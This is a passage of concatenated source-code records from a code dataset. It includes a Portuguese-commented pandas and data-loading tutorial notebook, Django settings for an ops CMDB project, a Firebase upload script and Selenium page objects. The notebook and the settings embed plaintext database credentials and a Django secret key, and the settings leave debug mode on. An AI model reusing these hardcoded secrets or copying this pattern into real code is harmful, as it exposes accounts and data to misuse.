In[86]:\n\ndef displaymulti(argscount=0, *unknownvars):\n realargscount = len(unknownvars)\n if argscount == realargscount:\n print('Você forneceu',argscount,'argumentos:',unknownvars)\n else:\n print('Você disse que forneceu',argscount,'argumentos mas na verdade forneceu', realargscount, 'argumentos:',unknownvars)\n \ndisplaymulti()\ndisplaymulti(2,'Hello',True)\ndisplaymulti(4,'String', 1+4j,4.33)\n\n\n# Condicionais\n# ==========\n# [Voltar](#Índice)\n\n# In[106]:\n\ndef SecretNumber():\n One = int(input(\"Type a number between 1 and 10: \"))\n Two = int(input(\"Type a number between 1 and 10: \"))\n if (One >= 1) and (One <= 10):\n if (Two >= 1) and (Two <= 10):\n print('Your secret number is:', (One ** Two/One)/(Two-One)**3)\n else:\n print(\"Incorrect second value!\")\n else:\n print(\"Incorrect first value!\")\n \nSecretNumber()\n\n\n# Loops\n# ========\n# [Voltar](#Índice)\n\n# In[111]:\n\ndef displaymultifor(*VarArgs):\n for Arg in VarArgs:\n if Arg.upper() == 'CONT':\n continue\n print('Continue Argument: ' + Arg)\n elif Arg.upper() == 'BREAK':\n break\n print('Break Argument: ' + Arg)\n print('Good Argument: ' + Arg)\n\ndisplaymultifor(\"a\",\"233\",\"cont\",\"test\",\"break\",\"never happens\")\n\n\n# In[114]:\n\ndef secretnumberwhile():\n GotIt = False\n while GotIt == False:\n One = int(input(\"Type a number between 1 and 10: \"))\n Two = int(input(\"Type a number between 1 and 10: \"))\n if (One >= 1) and (One <= 10):\n if (Two >= 1) and (Two <= 10):\n print('Secret number is:',One * Two)\n GotIt = True\n continue #Makes sure that the 'Try again!' message is not printed\n else:\n print(\"Incorrect second value!\")\n else:\n print(\"Incorrect first value!\")\n print(\"Try again!\")\n\nsecretnumberwhile()\n\n\n# Conjuntos\n# ======\n# Também conhecidos como **sets**
    \n# [Voltar](#Índice)\n\n# In[134]:\n\nSetA = set(['Red', 'Blue', 'Green', 'Black'])\nSetB = set(['Black', 'Green', 'Yellow', 'Orange'])\nSetX = SetA.union(SetB)\nSetY = SetA.intersection(SetB)\nSetZ = SetA.difference(SetB)\nprint('X = A ∪ B:',SetX,'\\nY = A ∩ B:',SetY,'\\nZ = A\\\\B:',SetZ)\nprint('A é um superconjunto de Y (A ⊃ Y)?',SetA.issuperset(SetY))\nprint('A é um subconjunto de X (A ⊂ X)?', SetA.issubset(SetX))\nprint('\\nAdicionando elementos em A\\n')\nSetA.add('Purple')\nprint('A é um subconjunto de X (A ⊂ X)?', SetA.issubset(SetX))\nprint('A agora tem novos membros:',SetA)\n\n\n# Listas\n# =======\n# [Voltar](#Índice)\n\n# In[37]:\n\nListA = [0, 1, 2, 3]\nListB = [4, 5, 6, 7]\n#Acrescenta ListB no fim de ListA\nListA.extend(ListB)\nprint(ListA)\n#Acrescenta o -4 no fim da lista\nListA.append(-4)\nprint(ListA)\n#Adiciona o 0.2 na posição 2 (a terceira posição da lista)\nListA[2]=0.2\nprint(ListA)\n#Remove A PRIMEIRA OCORRENCIA do valor -4 da lista\nListA.remove(-4)\nprint(ListA)\n#Forma manual de fazer o insert\nListA = ListA[:2]+[2]+ListA[3:]\nprint(ListA)\n#Remove A PRIMEIRA OCORRENCIA do valor 2 da lista\nListA.remove(2)\nprint(ListA)\n#Insere o valor 200 na posição 2 da lista\nListA.insert(2,200)\nprint(ListA)\nListA.append([\"Lists can contain all types of data\",4+2.3j])\nprint(ListA)\n\n\n# Tuplas\n# ========\n# Tuplas são como listas mas são imutáveis. Com isso as tuplas são mais seguras e mais rápidas que as listas\n# \n# [Voltar](#Índice)\n\n# In[36]:\n\ndef print_tuple_3levels(tpl):\n    for Value1 in tpl:\n        if type(Value1) == int:\n            print(Value1)\n        else:\n            for Value2 in Value1:\n                if type(Value2) == int:\n                    print(\"\\t\", Value2)\n                else:\n                    for Value3 in Value2:\n                        print( \"\\t\\t\", Value3)\n\nMyTuple = (1, 2, 3, (4, 5, 6, (7, 8, 9)))\n\nMyNewTuple = MyTuple.__add__((10, 11, 12, (13, 14, 15)))\n\nprint_tuple_3levels(MyTuple)\nprint_tuple_3levels(MyNewTuple)\n\n\n# ## Usando listas para iteradores em loops\n# \n# [Voltar](#Índice)\n\n# In[43]:\n\nListA = ['Orange', 'Yellow', 'Green', 'Brown']\nListB = [1, 2, 3, 4]\n\n#Gets a sublist from ListB and prints its values\nfor Value in ListB[1:3]:\n    print(Value)\n\n#Prints values iterating through two lists at the same time\nfor Value1, Value2 in zip(ListA, ListB):\n    print(Value1, '\\t', Value2)\n\n\n# # Dicionários\n# [Voltar](#Índice)\n\n# In[58]:\n\nMyDict = {'Orange': 1, 'Blue': 2, 'Pink': 3}\nprint(MyDict['Blue'])\n\nfor val in MyDict:\n    print(val)\n    \nprint(MyDict.keys())\nprint(MyDict.values())\n\n\n# # Lendo dados\n# * [Voltar](#Índice)\n# * [Lendo todo o conteúdo do arquivo para a memória](#Lendo-todo-o-conteúdo-do-arquivo-para-a-memória)\n# * [Fazendo \"streaming\". Lendo uma linha de cada vez](#Fazendo-\"streaming\".-Lendo-uma-linha-de-cada-vez)\n# * [Amostragem](#Amostragem)\n\n# ### Lendo todo o conteúdo do arquivo para a memória\n# \n# [Up](#Lendo-dados)\n\n# In[5]:\n\nwith open('Colors.txt') as colors_file:\n    data = colors_file.read()\n    print('Colors.txt content:\\n\\n', data)\n\n\n# ### Fazendo \"streaming\". 
Lendo uma linha de cada vez\n# \n# [Up](#Lendo-dados)\n\n# In[1]:\n\nwith open('Colors.txt') as colors_file:\n for file_line in colors_file:\n print('Reading Data:', file_line)\n\n\n# ### Amostragem\n# \n# [Up](#Lendo-dados)\n# \n# **Lendo uma a cada duas linhas**\n\n# In[31]:\n\nn = 2\n\nwith open('Colors.txt') as colors_file:\n#enumerate returns a tuple in the form (line_number, content)\n for j, content in enumerate(colors_file):\n if j % n == 0:\n print('Line',j,'-',content)\n\n\n# **Amostragem aleatória**\n\n# In[30]:\n\nfrom random import random\nsample_size = 0.5\nwith open(\"Colors.txt\") as open_file:\n for j, observation in enumerate(open_file):\n#random returns a value between 0 and 1. So, sample_size is in fact the probabilty of retreaving the data line\n if random()<=sample_size:\n print('Reading Line', j, ':', observation)\n\n\n# # Lendo dados estruturados com pandas\n# * [Voltar](#Índice)\n# * [Lendo arquivos texto](#Lendo-arquivos-texto)\n# * [Lendo arquivos csv](#Lendo-arquivos-csv)\n# * [Lendo arquivos posicionais (fixed width)](#Lendo-arquivos-posicionais-[fixed-width])\n# * [Lendo arquivos Excel](#Lendo-arquivos-Excel)\n\n# ### Lendo arquivos texto\n# \n# [Up](#Lendo-dados-estruturados-com-pandas)\n# \n# read_table, por padrão, usa \\t como separador mas é possível personalizar\n\n# In[32]:\n\nimport pandas as pd\ncolor_table = pd.io.parsers.read_table('Colors.txt')\nprint(color_table)\n\n\n# ### Lendo arquivos csv\n# \n# [Up](#Lendo-dados-estruturados-com-pandas)\n\n# In[40]:\n\ntitanic = pd.io.parsers.read_csv('Titanic.csv')\nprint(titanic[:5])\nprint(titanic[-5:])\n#reads age as a dataframe\nage = titanic[['age']]\nprint(age)\n#reads age as a list\nage = titanic[['age']].values\nprint(age)\n\n\n# ### Lendo arquivos posicionais [fixed width]\n# \n# [Up](#Lendo-dados-estruturados-com-pandas)\n\n# In[42]:\n\nfish_data = pd.read_fwf(\"x06.txt\", widths=[2,5,4,6], index_col=0,\n skiprows=37, header=None,\n names=[\"Age\", \"Temperature\", \"Length\"])\nfish_data[:10]\n\n\n# ### Lendo arquivos Excel\n# \n# [Up](#Lendo-dados-estruturados-com-pandas)\n# \n\n# In[82]:\n\n#Forma 1: Usando o parse\nxls = pd.ExcelFile('Values.xlsx')\ntrig_values = xls.parse('Sheet1', index_col=0, na_values=['NA'])\n\n#Forma 2: Usando o Read_Excel\ntrig_values = pd.read_excel('Values.xls', 'Sheet1', index_col=0, na_values=['NA'])\nprint(trig_values)\n\n\n# # Lendo imagens com *scikit-image*\n# [Voltar](#Índice)\n\n# In[87]:\n\n#Import libraries to read and show images\nfrom skimage.io import imread\nfrom skimage.transform import resize \nfrom matplotlib import pyplot as plt\nimport matplotlib.cm as cm\n\nexample_file = (\"http://upload.wikimedia.org/\" +\n \"wikipedia/commons/7/7d/Dog_face.png\")\n#Reads image into memory\nimage = imread(example_file, as_grey=True)\n#Renders the image\nplt.imshow(image, cmap=cm.gray)\n#Displays the image\nplt.show()\n\n\n# In[88]:\n\n#Shows image information\nprint('Data type: %s, shape: %s' %(type(image), image.shape))\n\n\n# In[89]:\n\n#Crops the image\nimage2 = image[5:70,0:70]\nplt.imshow(image2, cmap=cm.gray)\nplt.show()\n\n\n# In[96]:\n\n#Resizing the image\nimage3 = resize(image2, (30, 30), mode='edge')\nplt.imshow(image3, cmap=cm.gray)\nprint(\"data type: %s, shape: %s\" % \n (type(image3), image3.shape))\nplt.show()\n\n\n# In[100]:\n\n#Flattening the image so one can add it to a data frame\nimage_row = image3.flatten()\nprint(\"data type: %s, shape: %s\" % \n (type(image_row), image_row.shape))\n\n\n# # Lendo de bancos de dados\n# [Voltar](#Índice)\n\n# 
In[21]:\n\nimport mysql.connector as con\nimport timeit\nimport pandas as pd\n\ndef test():\n # Open database connection\n db = con.connect(host=\"db4free.net\",user=\"g2798774\",password=\"~b~_^SD~2[mm+k4#\",database=\"test_schema\" )\n\n # prepare a cursor object using cursor() method\n cursor = db.cursor()\n\n # execute SQL query using execute() method.\n cursor.execute(\"SELECT * FROM TB_TITANIC\")\n\n # Fetch a single row using fetchone() method.\n df = pd.DataFrame(cursor.fetchall())\n \n #closes the connection\n db.close()\n\n# print('Number of data:', len(df))\n \nget_ipython().magic('timeit for i in range(5): test()')\n\n\n# In[19]:\n\ndef slowtest():\n #This method is toooooooooooo slow!\n import mysql.connector\n from sqlalchemy import create_engine\n\n #creates an engine to connect to database\n engine = create_engine('mysql+mysqlconnector://g2798774:~b~_^SD~2[mm+k4#@db4free.net/test_schema')\n\n #Execute SQL and stores results in a pandas dataframe\n df = pd.read_sql(\"SELECT * FROM TB_TITANIC\", engine)\n\n# print('Number of data:', len(df))\n\nget_ipython().magic('timeit for i in range(5): slowtest()')\n\n\n# In[12]:\n\ndef fastest():\n import pandas as pd\n import mysql.connector as con\n\n # Open database connection\n db = con.connect(host=\"db4free.net\",user=\"g2798774\",password=\"~b~_^SD~2[mm+k4#\",database=\"test_schema\" )\n\n #Execute SQL and stores results in a pandas dataframe\n df = pd.read_sql(\"SELECT * FROM TB_TITANIC\", db)\n\n db.close()\n\n print(df.describe())\n\nget_ipython().magic('timeit fastest()')\n\n\n# # Lendo arquivos XML\n# [Voltar](#Índice)\n\n# In[2]:\n\nfrom lxml import objectify\nimport pandas as pd\n\nxml = objectify.parse(open('XMLData.xml'))\nroot = xml.getroot()\ndf = pd.DataFrame(columns=('Number', 'String', 'Boolean'))\n\nfor i in range(0,4):\n obj = root.getchildren()[i].getchildren()\n row = dict(zip(['Number', 'String', 'Boolean'], \n [obj[0].text, obj[1].text, \n obj[2].text]))\n row_s = pd.Series(row)\n row_s.name = i\n df = df.append(row_s)\n \nprint(df)\n\n\n# # Condicionando os dados\n# * [Voltar](#Índice)\n# * [Tratando registros duplicados](#Tratando-registros-duplicados)\n# * [Criando o mapa e o plano de dados](#Criando-o-mapa-e-o-plano-de-dados)\n\n# ### Tratando registros duplicados\n# \n# [Up](#Condicionando-os-dados)\n\n# In[1]:\n\nfrom lxml import objectify\nimport pandas as pd\n\n#Reads XML file as example above\nxml = objectify.parse(open('XMLData2.xml'))\nroot = xml.getroot()\ndf = pd.DataFrame(columns=('Number', 'String', 'Boolean'))\n\nfor i in range(0,4):\n obj = root.getchildren()[i].getchildren()\n row = dict(zip(['Number', 'String', 'Boolean'], \n [obj[0].text, obj[1].text, \n obj[2].text]))\n row_s = pd.Series(row)\n row_s.name = i\n df = df.append(row_s)\n\n#Marks duplicated rows\nsearch = pd.DataFrame.duplicated(df)\n\nprint(df)\nprint('\\nDuplicated records:')\nprint(df[search == True])\nprint('\\nDataframe without duplicates')\ndf = df.drop_duplicates()\nprint(df)\n\n\n# ### Criando o mapa e o plano de dados\n# \n# [Up](#Condicionando-os-dados)\n\n# In[2]:\n\nimport mysql.connector as con\n\n# Open database connection\ndb = con.connect(host=\"db4free.net\",user=\"g2798774\",password=\"~b~_^SD~2[mm+k4#\",database=\"test_schema\" )\n\n#Execute SQL and stores results in a pandas dataframe\ndf = pd.read_sql(\"SELECT * FROM TB_TITANIC\", db)\n\ndb.close()\n\nsearch = pd.DataFrame.duplicated(df)\n\nif len(df[search == True]) == 0:\n print('No duplicate values found')\nelse:\n df = df.drop_duplicates()\n\n\n# 
In[36]:\n\nprint(df.head())\n\npclass_grouped = df.groupby('pclass').describe()\nprint(pclass_grouped)\nprint(pclass_grouped.unstack())\nprint(pclass_grouped.unstack().loc[:,(slice(None),['count','mean','75%','max'])])\n\n\n# # Trabalhando com variáveis categóricas\n# * [Voltar](#Índice)\n# * [Criando variáveis categóricas](#Criando-variáveis-categóricas)\n# * [Renomeando níveis](#Renomeando-níveis)\n# * [Combinando níveis](#Combinando-níveis)\n\n# ### Criando variáveis categóricas\n# \n# [Up](#Trabalhando-com-variáveis-categóricas)\n\n# In[35]:\n\nimport pandas as pd\n\n#Creation of categories\ncar_colors = pd.Series(['Blue', 'Red', 'Green'], dtype='category')\n\n#Explicitly saying that the car data must follow the car_colors category\n#Entries that aren't found on categories list are NaN\ncar_data = pd.Series(\n    pd.Categorical(['Yellow', 'Green', 'Red', 'Blue', 'Purple'],\n                   categories=list(car_colors), ordered=False))\n\nfind_entries = pd.isnull(car_data)\n\nprint(car_colors)\nprint('\\n')\nprint(car_data)\nprint('\\n')\nprint('Invalid entries:\\n', find_entries[find_entries == True], sep='')\n\n\n# ### Renomeando níveis\n# \n# [Up](#Trabalhando-com-variáveis-categóricas)\n\n# In[60]:\n\nimport pandas as pd\n\ncar_colors = ['Blue', 'Red', 'Green']\n\ncar_data = pd.Series(\n    pd.Categorical(\n        ['Blue', 'Green', 'Red', 'Blue', 'Red'],\n        categories=car_colors, ordered=False))\n\nprint('Original car data\\n',car_data, '\\n', sep='')\n\n#Changing level names. Blue is now Purple, Red is now Yellow\ncar_colors = ['Purple', 'Yellow', 'Mauve']\ncar_data.cat.categories = car_colors\n\nprint('After renaming\\n',car_data, sep='')\n\n\n# ### Combinando níveis\n# \n# [Up](#Trabalhando-com-variáveis-categóricas)\n\n# In[71]:\n\nimport pandas as pd\n\ncar_colors = ['Blue', 'Red', 'Green']\ncar_data = pd.Series(\n    pd.Categorical(\n        ['Blue', 'Green', 'Red', 'Green', 'Red', 'Green'],\n        categories=car_colors, ordered=False))\n\n#First, renames the Blue category to Blue_Red\ncar_data.cat.categories = ['Blue_Red', 'Red', 'Green']\nprint(car_data.ix[car_data.isin(['Red'])])\n\n#Now changes all Red (positions 2 and 4) elements to Blue_Red\ncar_data.ix[car_data.isin(['Red'])] = 'Blue_Red'\n\nprint('\\n')\nprint(car_data)\n\n\n# # Trabalhando com datas\n# [Voltar](#Índice)\n\n# In[5]:\n\nimport datetime as dt\n#Two different approaches on printing dates and times\nnow = dt.datetime.now()\nprint(str(now))\nprint(now.strftime('%a, %d %B %Y; %H:%M:%S'))#%a: weekday, %d: day, %B: Month, %Y: Year\n\n\n# In[8]:\n\nimport datetime as dt\nnow = dt.datetime.now() \n#Changing local time by two timezones ie two hours\ntimevalue = now + dt.timedelta(hours=2)\nprint(now.strftime('%H:%M:%S'))\nprint(timevalue.strftime('%H:%M:%S'))\ntdelta = timevalue - now\nprint(tdelta)\n\n\n# # Tratando dados faltantes\n# * [Identificando dados faltantes](#Identificando-dados-faltantes)\n# * [Preenchendo dados faltantes](#Preenchendo-dados-faltantes)\n# * [Inferindo dados faltantes](#Inferindo-dados-faltantes)\n# \n# [Voltar](#Índice)\n\n# ### Identificando dados faltantes\n# [Up](#Tratando-dados-faltantes)\n\n# In[11]:\n\nimport pandas as pd\nimport numpy as np\n\ns = pd.Series([1, 2, 3, np.NaN, 5, 6, None])\n\nprint(s.isnull(),'\\n\\n')\n\nprint('The dataset contains ',len(s[s.isnull()]),' missing values which are\\n',s[s.isnull()],sep='')\n\n\n# ### Preenchendo dados faltantes\n# [Up](#Tratando-dados-faltantes)\n\n# In[16]:\n\nimport pandas as pd\nimport numpy as np\n\ns = pd.Series([1, 2, 3, np.NaN, 5, 6, 
None])\n\nprint(s.fillna(int(s.mean())))\nprint('\\n')\nprint(s.dropna())\n\n\n# ### Inferindo dados faltantes\n# [Up](#Tratando-dados-faltantes)\n\n# In[103]:\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import Imputer\n\ns = pd.Series([1, 2, 3, np.NaN, 5, 6, None])\n\n#axis = 0 means column\nimp = Imputer(missing_values='NaN', strategy='mean', axis=0)\n\n#Need to use double brackets to explicit to new versions of numpy\n#That I am using a single-row array\n#This array is where numpy will calculate the mean\n#Since this is a single-row array when it tries to calculate\n#the mean of the 4th column, the mean is 4. So it fills the\n#blank with 4 and 7 if I make axis=0 above\nimp.fit([[1, 2, 3, 4, 5, 6, 7]])\n\nprint(s,'\\n')\n#Using reshape also to make clear to numpy that the series\n#s is a single-column array (1 column, -1 line)\nprint(pd.Series(imp.transform(s.reshape(1, -1))[0]))\n\n\n# # Fatiando\n# * [Filtrando linhas](#Filtrando-linhas)\n# * [Filtrando colunas](#Filtrando-colunas)\n# * [*Cortando em cubos*](#Cortando-em-cubos)\n# \n# [Voltar](#Índice)\n\n# ### Filtrando linhas\n# [Up](#Fatiando)\n\n# In[5]:\n\nimport numpy as np\n\nx = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9],],\n [[11,12,13], [14,15,16], [17,18,19],],\n [[21,22,23], [24,25,26], [27,28,29]]])\n\nx[1]\n\n\n# ### Filtrando colunas\n# [Up](#Fatiando)\n\n# In[27]:\n\nx = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9],],\n [[11,12,13], [14,15,16], [17,18,19],],\n [[21,22,23], [24,25,26], [27,28,29]]])\n\n#If you use x[:2] it will print all columns up to colume 2 (excluded)\n#Using x[:,2] shows only column 2 (third column)\nx[:,2]\n\n\n# ### Cortando em cubos\n# \"Cortar em cubos\" é o equivalente a pegar um conjunto de linhas e colunas de um dataset\n# \n# [Up](#Fatiando)\n\n# In[52]:\n\nx = np.array([[[1, 2, 3], [4, 5, 6], [7, 8, 9],],\n [[11,12,13], [14,15,16], [17,18,19],],\n [[21,22,23], [24,25,26], [27,28,29]]])\n\nprint('x\\n',x,sep='')\nprint('\\nx[1,1]\\n',x[1,1],sep='')\nprint('\\nx[:,1,1]\\n',x[:,1,1], sep='')\nprint('\\nx[1,:,1]\\n',x[1,:,1],sep='')\n\nprint('\\nx[1:3, 0:2]\\n',x[1:3, 0:2],sep='')\n\n\n# # Concatenando e transformando\n# * [Adicionando casos e variáveis](#Adicionando-casos-e-variáveis)\n# * [Removendo dados](#Removendo-dados)\n# * [Ordenando e embaralhando](#Ordenando-e-embaralhando)\n# \n# [Voltar](#Índice)\n\n# ### Adicionando casos e variáveis\n# Para outras formas de unir dois *dataframes*: http://pandas.pydata.org/pandas-docs/stable/merging.html\n# \n# [Up](#Concatenando-e-transformando)\n\n# In[11]:\n\nimport pandas as pd\n\ndf = pd.DataFrame({'A': [2,3,1],\n 'B': [1,2,3],\n 'C': [5,3,4]})\n\ndf1 = pd.DataFrame({'A': [4],\n 'B': [4],\n 'C': [4]})\n\n#Easiest way to add new cases to a dataframe.\n#Use ignore_index = True or the new DataFrame will keep old indexes\ndf = df.append(df1, ignore_index=True)\nprint(df)\n\n#A more complex way to add a new case\ndf.loc[df.last_valid_index() + 1] = [5, 5, 5]\nprint('\\n',df,sep='')\n\ndf2 = pd.DataFrame({'D': [1, 2, 3, 4, 5]})\n\n#Joint the two dataframes on row index\n#This is why row indexing is so important\ndf = pd.DataFrame.join(df, df2)\nprint('\\n')\nprint(df)\n\n\n# ### Removendo dados\n# [Up](#Concatenando-e-transformando)\n\n# In[27]:\n\nimport pandas as pd\n\ndf = pd.DataFrame({'A': [2,3,1],\n 'B': [1,2,3],\n 'C': [5,3,4]})\n\ndf = df.drop(df.index[[1]])\nprint(df)\n\ndf = df.drop('B', 1)\nprint('\\n')\nprint(df)\n\n\n# ### Ordenando e embaralhando\n# [Up](#Concatenando-e-transformando)\n\n# In[30]:\n\nimport 
pandas as pd\nimport numpy as np\n\ndf = pd.DataFrame({'A': [2,1,2,3,3,5,4],\n 'B': [1,2,3,5,4,2,5],\n 'C': [5,3,4,1,1,2,3]})\n\ndf = df.sort_values(by=['A', 'B'], ascending=[True, True])\nprint('Sorting...\\n')\nprint(df)\nprint('\\nReset index\\n')\ndf = df.reset_index(drop=True)\nprint(df)\n\n\nindex = df.index.tolist()\nnp.random.shuffle(index)\ndf = df.ix[index]\ndf = df.reset_index(drop=True)\nprint('\\nSuffling data\\n')\nprint(df)\n\n\n# # Agregação\n# [Voltar](#Índice)\n\n# In[39]:\n\nimport pandas as pd\n\ndf = pd.DataFrame({'Map': [0,0,0,1,1,2,2],\n 'Values': [1,2,3,5,4,2,5]})\n\ndf['S'] = df.groupby('Map')['Values'].transform(np.sum)\ndf['M'] = df.groupby('Map')['Values'].transform(np.mean)\ndf['V'] = df.groupby('Map')['Values'].transform(np.var)\n\nprint(df)\nprint('\\n')\nprint(df[['Map','S','M','V']].drop_duplicates().reset_index(drop=True))\n\n","sub_path":"_Minhas anotações e testes.py","file_name":"_Minhas anotações e testes.py","file_ext":"py","file_size_in_byte":22437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"459153543","text":"\"\"\"\nDjango settings for ops project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'wdj$%*z%j#&@gkg^ao+f50i9f6@_7_ms*4$i5=+5#p@5&y36*_'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'haystack',\n #'south',\n 'cmdb',\n 'rest_framework.authtoken'\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n)\n\nROOT_URLCONF = 'ops.urls'\n\nWSGI_APPLICATION = 'ops.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\nDATABASES = {\n 'default': {\n #'ENGINE': 'django.db.backends.sqlite3',\n #'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME':'cmdb',\n 'USER':'cmdb',\n 'PASSWORD':'cmdbpassword',\n 'HOST':'127.0.0.1',\n 'PORT':'3306',\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\n#TIME_ZONE = 'UTC'\nTIME_ZONE = 'Asia/Shanghai'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n#STATIC_ROOT = '/opt/web/ops/static/'\n\nHAYSTACK_CONNECTIONS = {\n 'default': {\n 'ENGINE': 'haystack.backends.solr_backend.SolrEngine',\n 'URL': 
'http://127.0.0.1:8983/solr/cmdb'\n # ...or for multicore...\n # 'URL': 'http://127.0.0.1:8983/solr/mysite',\n },\n}\nLOGIN_URL = '/cmdb/login'\nSESSION_SAVE_EVERY_REQUEST = True\n","sub_path":"ops/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"615026825","text":"import os\nimport json\n\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import storage\n\ncred = credentials.Certificate(\"serviceKey.json\")\n\nfirebase_admin.initialize_app(cred, {\n 'storageBucket': 'wbusch-f8fb7.appspot.com'\n})\n\nbucket = storage.bucket()\n\nfiltros = []\n\ndef upload_blob(source_file_name, destination_blob_name):\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(\n source_file_name,\n content_type=\"image/jpg\"\n )\n\n print('File {} uploaded to {}.'.format(\n source_file_name,\n destination_blob_name))\n\n url = blob.public_url\na = 0\nwith open(\"filtros.json\", \"r+\") as f:\n filtros = json.load(f)\n for i, filtro in enumerate(filtros):\n try:\n blob = bucket.blob(\"opt/\" + filtro[\"Title\"] + \".jpg\")\n\n blob.upload_from_filename(\n \"optimized/\" + filtro[\"Title\"] + \".jpg\",\n content_type=\"image/jpg\"\n )\n url = blob.public_url\n filtros[i][\"imagen\"] = url\n a = a+1\n print(a)\n except:\n pass\n # filtros = json.dump(filtros)\n # f.write(filtros)\n # f.close()\n\n# for fn in os:\n # upload_blob(\"img/\" + fn, \"img/\" + fn)","sub_path":"storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24369952","text":"# -*- coding: utf-8 -*-\n\nfrom items import InputWithName, BtnWithClass, DropMenuWithText, BtnWithText, DropMenuWithTitle, PopMenuWithName\nfrom util import toDict\nfrom commonPage import CommonPage, TablePage\n\nclass AddForm(CommonPage):\n\n\tdef __init__(self, driver):\n\n\t\tCommonPage.__init__(self, driver)\n\n\t\tformDriver = self.entry_form_by_id(id_= 'addBtn', formId= 'addModal')\n\n\t\taddForm = {\n\t\t\t'saleAreaName': InputWithName(formDriver, 'saleAreaName'),\n\t\t\t'remark': InputWithName(formDriver, 'remark'),\n\t\t\t'pSaleAreaName': DropMenuWithTitle(formDriver, 'pSaleAreaName'),\n\t\t\t'saleAreaManagerName': PopMenuWithName(formDriver, dict(driver= driver, formId= 'srhMgrForm', srcName= 'userName', tblId= 'sautbl', btnOk= 'getMgrBtn'), name_= 'saleAreaManagerName'),\n\t\t\t'cancel': BtnWithText(formDriver, '取消'),\n\t\t\t'submit': BtnWithText(formDriver, '保存'),\n\t\t}\n\n\t\tself.sort = ['saleAreaName', 'pSaleAreaName', 'saleAreaManagerName', 'remark']\n\n\t\tself.addForm = toDict(addForm)\n\n\n\n\nclass SearchForm(CommonPage):\n\n\tdef __init__(self, driver):\n\n\t\tCommonPage.__init__(self, driver)\n\n\t\tformDriver = self.entry_form_by_text(text= '高级查询', formId= 'searchModal')\n\n\t\tsearchForm = {\n\t\t\t'saleAreaName': InputWithName(formDriver, 'saleAreaName'),\n\t\t\t'saleAreaManagerName': InputWithName(formDriver, 'saleAreaManagerName'),\n\t\t\t'status': DropMenuWithText(formDriver, 'status'),\n\t\t\t'search': BtnWithText(formDriver, '查询'),\n\t\t}\n\n\t\tself.searchForm = toDict(searchForm)\n\n\nclass TableForm(TablePage):\n\n\tdef __init__(self, driver):\n\n\t\tTablePage.__init__(self, driver)\n\n\t\tself.tableId = 'satbl'\n\n\t\tself.tableList = ['checkbox', 'pSaleAreaName', 'saleAreaName', 'saleAreaManagerName', 'remark', 'stauts']\n\n\ndef 
change_manager(driver, managerName):\n\tbind_menu = PopMenuWithName(driver, dict(driver= driver, formId= 'mgrForm4bind', srcName= 'userName', tblId= 'sautbl4bind', btnOk= 'bindModal_okBtn'), id_= 'bindBtn')\n\tbind_menu.choose(managerName)\t","sub_path":"atdriver/saleareaPage.py","file_name":"saleareaPage.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"382400887","text":"from ratelimit.version import Version\nfrom tests import unittest\n\nclass TestVersion(unittest.TestCase):\n\n    def test_set_version(self):\n        ver = Version('1.0.0')\n        self.assertEqual(ver.number, '1.0.0')\n\n    def test_version_immutable(self):\n        ver = Version('1.0.0')\n        with self.assertRaises(TypeError):\n            ver.number = '1.1.0'\n","sub_path":"tests/unit/version_test.py","file_name":"version_test.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"439655314","text":"from tkinter import* \r\nfrom tkinter import messagebox\r\n\r\n\r\n# 7\r\ndef onClick():\r\n    data1 = text.get()\r\n    messagebox.showinfo(\"입력받은값\", data1) # 5\r\n    print(\"입력받은값\", data1)\r\n\r\n# Tk() 화면 출력 1\r\nwindow = Tk()\r\n\r\n# 3\r\nname = Label(window, text = \"이름을 입력하세요\")\r\nname.pack()\r\n\r\n# 4\r\ntext = Entry(window)\r\ntext.pack()\r\n\r\n#버튼 생성 후 빈화면에 얹기 2 , 6\r\nbtn = Button(window,text = \"입력버튼\", command = 